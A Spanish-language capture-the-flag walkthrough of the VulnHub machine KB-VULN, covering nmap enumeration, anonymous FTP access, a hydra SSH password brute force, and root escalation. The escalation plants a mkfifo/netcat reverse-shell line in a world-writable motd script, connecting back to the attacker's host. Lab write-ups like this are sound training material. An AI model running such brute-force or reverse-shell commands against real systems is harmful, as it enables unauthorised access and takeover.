[VULNHUB] KB-VULN

Hoy vamos a hackear la maquina de Vulnhub llamada KB-VULN. Podeis descargarla desde el siguiente enlace: http://vulnhub.com/entry/kb-vuln-1,540/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.91 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST Nmap scan report for 192.168.1.91 Host is up (0.00064s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.59 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA) | 256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA) |_ 256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: OneSchool — Website by Colorlib Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds

Vemos que tiene abiertos los puerto del FTP, SSH y HTTP. En el codigo fuente de la pagina web inicial podemos encontrar el siguiente comentario:

Username : sysadmin

Por otro lado, nos conectamos al ftp usando los credenciales anonymous/anonymous.

~/KB > ftp 192.168.1.91 Connected to 192.168.1.91. 220 (vsFTPd 3.0.3) Name (192.168.1.91:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 . drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 .. -rw-r--r-- 1 0 0 54 Aug 22 17:39 .bash_history 226 Directory send OK.

Vemos que hay un fichero .bash_history. Lo descargamos.

ftp> get .bash_history local: .bash_history remote: .bash_history 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .bash_history (54 bytes). 226 Transfer complete. 54 bytes received in 0.00 secs (73.3441 kB/s) ftp>

Echamos un vistazo al contenido del fichero...

~/KB > cat .bash_history exit ls cd /etc/update-motd.d/ ls nano 00-header exit

Vemos que "edita" el fichero 00-header. Dicho fichero solo lo deberia poder editar root, ya que se ejecuta cada vez que alguien se loguea al sistema. Si conseguimos acceso al sistema, y podemos editar el fichero, podemos utilizarlo para elevar nuestros privilegios. Como no podemos ir por ningun otro lado, hacemos bruteforce por SSH al usuario que hemos encontrado en el comentario de la web, sysadmin.

~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt 192.168.1.91 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 10:56:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://192.168.1.91:22/ [22][ssh] host: 192.168.1.91 login: sysadmin password: password1 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 10:56:54

Encontramos la password :) Nos logueamos!

Low Shell

~ > ssh sysadmin@192.168.1.91 sysadmin@192.168.1.91's password: WELCOME TO THE KB-SERVER Last login: Sat Aug 22 18:00:48 2020 To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. sysadmin@kb-server:~$

user.txt

sysadmin@kb-server:~$ ls -la total 40 drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 . drwxr-xr-x 3 root root 4096 Aug 22 17:53 .. -rw------- 1 sysadmin sysadmin 16 Aug 22 18:04 .bash_history -rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc drwx------ 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp drwx------ 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg -rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile -rw-r--r-- 1 root root 33 Aug 22 17:54 user.txt sysadmin@kb-server:~$ cat user.txt 48a365b4ce1e322a55ae9017f3daf0c0

Privilege Escalation

Miramos si podemos modificar el fichero 00-header como hemos visto anteriormente...

sysadmin@kb-server:~$ ls -l /etc/update-motd.d/00-header -rwxrwxrwx 1 root root 989 Aug 22 17:08 /etc/update-motd.d/00-header

Vemos que si :) Lo editamos para agregar una linea al final, que nos de una reverse shell a nuestra maquina con privilegios!

sysadmin@kb-server:~$ nano /etc/update-motd.d/00-header echo "\n\t\t\tWELCOME TO THE KB-SERVER\n" rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.59 8888 >/tmp/f

Ponemos nc a la escucha.

~ > nc -nlvp 8888 listening on [any] 8888 ...

Nos logueamos de nuevo con el usuario y obtemos la reverse shell...

~ > nc -nlvp 8888 listening on [any] 8888 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.91] 52826 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)

root.txt

# cd /root # ls flag.txt # cat flag.txt 1eedddf9fff436e6648b5e51cb0d2ec7 #

End

Y con esto ya seriamos root de la maquina.